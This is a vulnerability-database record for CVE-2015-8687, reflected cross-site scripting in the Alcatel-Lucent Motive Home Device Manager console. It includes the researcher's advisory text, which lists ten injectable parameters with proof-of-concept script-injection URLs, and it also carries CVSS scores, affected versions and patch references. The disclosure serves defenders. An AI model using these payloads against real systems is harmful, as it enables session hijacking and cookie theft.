Sign-up

ID

VAR-201703-0219


CVE

CVE-2015-8687


TITLE

Alcatel-Lucent Motive Home Device Manager of Management Console Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2015-007437

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the Management Console in Alcatel-Lucent Motive Home Device Manager (HDM) before 4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceTypeID parameter to DeviceType/getDeviceType.do; the (2) policyActionClass or (3) policyActionName parameter to PolicyAction/findPolicyActions.do; the deviceID parameter to (4) SingleDeviceMgmt/getDevice.do or (5) device/editDevice.do; the operation parameter to (6) ajax.do or (7) xmlHttp.do; or the (8) policyAction, (9) policyClass, or (10) policyName parameter to policy/findPolicies.do. (1) DeviceType/getDeviceType.do of deviceTypeID Parameters (2) policyActionClass (3) PolicyAction/findPolicyActions.do of policyActionName Parameter or deviceID Parameters (4) SingleDeviceMgmt/getDevice.do (5) device/editDevice.do Operating parameters (6) ajax.do (7) xmlHttp.do (8) policyAction (9) policyClass (10) policy/findPolicies.do of policyName Parameters. Alcatel-LucentHomeDeviceManager is a device manager that helps manage and control home network devices through the help desk. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 10 Dec 2015 Vendor returned ; investigating 16 Dec 2015 Vendor has validated the issues & fixed 27 Dec 2015 CVE number assigned 03 Jan 2016 Disclosured Affected Product(s): ==================== Alcatel Lucent Home Device Manager - Management Console 4.1.10.5 may be old version could be affected Exploitation Technique: ======================= Local, Authenticated Severity Level: =============== High Technical Details & Description: ================================ Ø Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4 Ø Affected Path/Parameter: [10 parameter] 1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter] o http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36 <script>alert(1)<%2fscript>152b4 2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter] o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31 "><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0 3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter] o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3 "><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0 4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter] o http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b <script>alert(1)<%2fscript>1a032 5. /hdm/ajax.do [operation parameter] o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81 <script>alert(1)<%2fscript>238957ca4e0&deviceId=8001 6. /hdm/device/editDevice.do [deviceID parameter] o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5 <script>alert(1)<%2fscript>45f4a 7. /hdm/policy/findPolicies.do [policyAction parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01 "><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all 8. /hdm/policy/findPolicies.do [policyClass parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb "><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all 9. /hdm/policy/findPolicies.do [policyName parameter] o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd "><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all 10. /hdm/xmlHttp.do [operation parameter] o http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c <script>alert(1)<%2fscript>217f045ae1f&deviceID=8001 Proof of Concept (PoC): ======================= POC Video; https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing Solution Fix & Patch: ==================== Fixed version of 4.2 Security Risk: ============== The risk of the vulnerability above estimated as high. Credits & Authors: ================== Ugur Cihan Koc(@_uceka_) Blog: www.uceka.com

Trust: 2.52

sources: NVD: CVE-2015-8687 // JVNDB: JVNDB-2015-007437 // CNVD: CNVD-2016-00356 // BID: 79864 // PACKETSTORM: 135133

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2016-00356

AFFECTED PRODUCTS

vendor:alcatel lucentmodel:motive home device managerscope:lteversion:4.1.10.5

Trust: 1.0

vendor:alcatel lucentmodel:home device managerscope:eqversion:4.1.10.5

Trust: 0.9

vendor:alcatel lucentmodel:motive home device managerscope:ltversion:4.2

Trust: 0.8

vendor:alcatel lucentmodel:motive home device managerscope:eqversion:4.1.10.5

Trust: 0.6

vendor:alcatel lucentmodel:home device managerscope:neversion:4.2

Trust: 0.3

sources: CNVD: CNVD-2016-00356 // BID: 79864 // JVNDB: JVNDB-2015-007437 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-8687
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-8687
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2016-00356
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201601-316
value: LOW

Trust: 0.6

nvd@nist.gov: CVE-2015-8687
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2016-00356
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2015-8687
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2016-00356 // JVNDB: JVNDB-2015-007437 // CNNVD: CNNVD-201601-316 // NVD: CVE-2015-8687

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2015-007437 // NVD: CVE-2015-8687

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201601-316

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 135133 // CNNVD: CNNVD-201601-316

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-007437

PATCH
title:Top Pageurl:https://networks.nokia.com/
Trust: 0.8
title:Patch for Alcatel-LucentHomeDeviceManager Cross-Site Scripting Vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/70289
Trust: 0.6
sources:
            
            
            CNVD: CNVD-2016-00356 // 
            
            
            
            JVNDB: JVNDB-2015-007437

EXTERNAL IDS
db:NVDid:CVE-2015-8687
Trust: 3.4
db:BIDid:79864
Trust: 1.5
db:JVNDBid:JVNDB-2015-007437
Trust: 0.8
db:CNVDid:CNVD-2016-00356
Trust: 0.6
db:CNNVDid:CNNVD-201601-316
Trust: 0.6
db:PACKETSTORMid:135133
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-00356 // 
            
            
            
            BID: 79864 // 
            
            
            
            JVNDB: JVNDB-2015-007437 // 
            
            
            
            PACKETSTORM: 135133 // 
            
            
            
            CNNVD: CNNVD-201601-316 // 
            
            
            
            NVD: CVE-2015-8687

REFERENCES
url:http://seclists.org/fulldisclosure/2016/jan/0
Trust: 2.7
url:http://www.securityfocus.com/bid/79864
Trust: 1.2
url:https://nvd.nist.gov/vuln/detail/cve-2015-8687
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8687
Trust: 0.8
url:http://www.alcatel-lucent.com/
Trust: 0.3
url:http://10.240.71.198:7003/hdm/devicetype/getdevicetype.do?devicetypeid=42f8b36
Trust: 0.1
url:http://10.240.71.198:7003/hdm/device/editdevice.do?deviceid=8001c94e5
Trust: 0.1
url:http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1&policyactionname=&policyactionclass=c9e31
Trust: 0.1
url:http://10.240.71.198:7003/hdm/xmlhttp.do?operation=getqueuedactionsd4b0c
Trust: 0.1
url:http://10.240.71.198:7003/hdm/singledevicemgmt/getdevice.do?deviceid=8001a1a0b
Trust: 0.1
url:https://www.uceka.com
Trust: 0.1
url:https://drive.google.com/file/d/0b-lwhbwdk3p9y3uyznfmzjjqa1u/view?usp=sharing
Trust: 0.1
url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=&policyaction=&policyclass=c77cb
Trust: 0.1
url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=&policyaction=19f01
Trust: 0.1
url:http://10.240.71.198:7003/hdm/ajax.do?operation=getdevicebyid0fa81
Trust: 0.1
url:http://10.240.71.198:7003/hdm/policy/findpolicies.do?policysearch=1&policyname=654dd
Trust: 0.1
url:http://10.240.71.198:7003/hdm/policyaction/findpolicyactions.do?policyactionsearch=1&policyactionname=553a3
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2016-00356 // 
            
            
            
            BID: 79864 // 
            
            
            
            JVNDB: JVNDB-2015-007437 // 
            
            
            
            PACKETSTORM: 135133 // 
            
            
            
            CNNVD: CNNVD-201601-316 // 
            
            
            
            NVD: CVE-2015-8687

CREDITS
Ugur Cihan Koc
Trust: 1.0
sources:
            
            
            BID: 79864 // 
            
            
            
            PACKETSTORM: 135133 // 
            
            
            
            CNNVD: CNNVD-201601-316

SOURCES
db:CNVDid:CNVD-2016-00356
db:BIDid:79864
db:JVNDBid:JVNDB-2015-007437
db:PACKETSTORMid:135133
db:CNNVDid:CNNVD-201601-316
db:NVDid:CVE-2015-8687

LAST UPDATE DATE
2025-04-20T23:29:44.692000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2016-00356date:2016-01-20T00:00:00
db:BIDid:79864date:2016-01-03T00:00:00
db:JVNDBid:JVNDB-2015-007437date:2017-04-25T00:00:00
db:CNNVDid:CNNVD-201601-316date:2017-03-30T00:00:00
db:NVDid:CVE-2015-8687date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE
db:CNVDid:CNVD-2016-00356date:2016-01-20T00:00:00
db:BIDid:79864date:2016-01-03T00:00:00
db:JVNDBid:JVNDB-2015-007437date:2017-04-25T00:00:00
db:PACKETSTORMid:135133date:2016-01-05T13:13:13
db:CNNVDid:CNNVD-201601-316date:2016-01-15T00:00:00
db:NVDid:CVE-2015-8687date:2017-03-23T20:59:00.733